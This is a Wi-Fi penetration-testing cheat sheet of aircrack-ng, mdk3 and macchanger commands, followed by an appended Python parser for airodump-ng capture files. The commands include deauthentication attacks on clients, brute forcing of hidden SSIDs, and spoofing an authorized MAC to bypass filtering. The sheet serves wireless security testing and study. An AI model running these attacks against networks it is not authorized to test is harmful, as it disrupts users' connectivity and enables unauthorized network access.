# 🛜 WIFI
## Terminologies fundamentals
| Term | Definition |
|---|---|
| SSID | Service Set Identifier. The Wi-Fi network name visible to users. |
| BSSID | Basic Service Set Identifier. The MAC address of the access point. |
| ESSID | Extended Service Set Identifier. Usually identical to SSID; used for extended networks (roaming). |
| Beacon | Management frame sent periodically by the AP to announce its presence (SSID, BSSID, channel, security). |
| IV | Initialization Vector. Sent in cleartext with each encrypted packet. Combined with the key to generate the keystream. Essential for WEP attacks. |
## Interface Management

### Check State

```bash
iwconfig   # Show interfaces and status
iw list    # Show driver capabilities
```

### Interface Configuration

```bash
# Bring interface up/down
ip link set wlan0 up
ip link set wlan0 down

# Delete a virtual monitor interface
iw dev wlan0mon del

# Create a monitor interface manually
iw dev wlan0 interface add mon0 type monitor
```

```bash
airmon-ng                  # List interfaces and chipsets
airmon-ng check            # Show interfering processes
airmon-ng check kill       # Kill NetworkManager, wpa_supplicant, etc.
airmon-ng start wlan0      # Create wlan0mon (monitor mode)
airmon-ng start wlan0 6    # Start on a specific channel
airmon-ng stop wlan0mon    # Stop monitor mode
```

```bash
# Test injection
aireplay-ng -9 wlan0mon
```

### ⚡ TX Power

```bash
# View current region and TX power limits
iw reg get

# Change region
iw reg set US

# Set TX power (interface must be down)
iwconfig wlan0 txpower 30
```

### Scan

```bash
iwlist wlan0 scan | grep -E 'Cell|Quality|ESSID|IEEE'
```

### Channel & Frequency

```bash
# List available channels
iwlist wlan0 channel

# Set channel (interface must be down)
iw dev wlan0mon set channel 6
iwconfig wlan0mon channel 11

# Set frequency
iwconfig wlan0 freq "5.52G"

# Show current frequency
iwlist wlan0 frequency | grep Current
```

## airodump-ng
```bash
airodump-ng $interface                # Start capture
airodump-ng -c 6,11 $interface        # Channels 6 and 11
airodump-ng --band a $interface       # a: 5 GHz
airodump-ng --band bg $interface      # b: 2.4 GHz (11 Mbps) | g: 2.4 GHz (54 Mbps)
airodump-ng -w capture $interface     # Save to file (capture-01.cap, capture-01.csv, ...)
```

## Hidden SSID Discovery
When ESSID = <length: 0> in airodump-ng, the SSID is hidden.
- Passive method: wait for a client to connect

```bash
airodump-ng $interface -c $channel --bssid $bssid -w capture
```

- Active method: deauth attack, force a client to reconnect

```bash
aireplay-ng -0 2 -a $bssid -c $client_mac $interface
```

### Brute-force SSID
```bash
# Full brute-force (short SSIDs only)
mdk3 $interface p -b u -c 1 -t $bssid

# Wordlist attack
mdk3 $interface p -f /opt/wordlist.txt -t $bssid

# Character sets: u (uppercase), n (digits), a (all), c (mixed case), m (mixed + numbers)
```

## MAC Filtering Bypass
- Identify an authorized client MAC from airodump-ng (`STATION` column)
- Spoof your MAC

```bash
# Show current MAC address
macchanger $interface

# (Interface must be down)
macchanger -m $authorized_mac $interface
```

- Deauth the legitimate client

```bash
aireplay-ng -0 1 -a $bssid -c $authorized_mac $interface
```

## Aircrack-ng Suite
```bash
# Deauthentication (transverse attack)
aireplay-ng -0 <packets> -a $bssid -c $client_mac $interface
```

```bash
# Generate graph from airodump-ng CSV
airgraph-ng -i capture-01.csv -g CAPR -o out.png

# Graph types:
# - CAPR: Client-to-AP relationship
# - CPG:  Common probe graph (clients linked to the ESSIDs they probe for)
```
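Two things above are read straight out of airodump-ng's CSV: the hidden-SSID check (an AP whose ESSID shows as `<length: 0>`) and the client-to-AP view that airgraph-ng draws with `-g CAPR`. The parser below reproduces both offline, plus an open/WEP inventory, from a constructed sample; it is an added example, not code from the page or from the aircrack-ng project, and it assumes the `capture-01.csv` layout (the `Station MAC` header opens the client section, unassociated clients carry `(not associated)` in the BSSID column).

```python
import csv
import io
# Constructed sample in the airodump-ng CSV layout (what `-w capture` writes to
# capture-01.csv): two APs, the second with a hidden ESSID, and two stations.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   8, CorpWiFi,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WEP , WEP, , -60,   80,  1200,   0.  0.  0.  0,   0, ,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -50,  30, 00:11:22:33:44:55, CorpWiFi
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -70,   5, (not associated), CorpWiFi,GuestNet
"""

def _rows(section):
    # Strip airodump's cell padding and drop the blank separator lines
    return [[c.strip() for c in r] for r in csv.reader(io.StringIO(section))
            if any(c.strip() for c in r)]

def parse_airodump_csv(text):
    """Return ({bssid: ap}, {station_mac: station}) from an airodump-ng CSV."""
    ap_text, marker, sta_text = text.partition("Station MAC")
    aps, stations = {}, {}
    for r in _rows(ap_text)[1:]:  # [1:] skips the header row
        aps[r[0]] = {"channel": r[3], "privacy": r[5], "ivs": int(r[10]),
                     "id_length": int(r[12]), "essid": ",".join(r[13:-1])}
    for r in _rows(marker + sta_text)[1:]:
        # Probed ESSIDs are comma separated, so they spill into extra cells
        stations[r[0]] = {"bssid": r[5], "probed": [p for p in r[6:] if p]}
    return aps, stations

def hidden_aps(aps):
    """BSSIDs whose beacons carry no ESSID (airodump-ng shows <length: 0>)."""
    return sorted(b for b, a in aps.items() if not a["essid"])

def weak_crypto_aps(aps):
    """Open or WEP networks, with the number of WEP IVs captured for each."""
    return {b: a["ivs"] for b, a in aps.items() if a["privacy"] in ("OPN", "WEP")}

def client_ap_map(aps, stations):
    """Client-to-AP relationships, the view airgraph-ng draws with -g CAPR."""
    assoc = {}
    for mac, s in stations.items():
        if s["bssid"] in aps:
            assoc.setdefault(s["bssid"], []).append(mac)
    return {b: sorted(m) for b, m in assoc.items()}

def unassociated_probes(stations):
    """Stations joined to no AP, with the ESSIDs they are probing for."""
    return {m: s["probed"] for m, s in stations.items() if s["bssid"] == "(not associated)"}
```

Point `parse_airodump_csv` at the contents of a real `capture-01.csv` to get the same four views over a live survey; the probe list of unassociated stations is the data behind airgraph-ng's CPG graph.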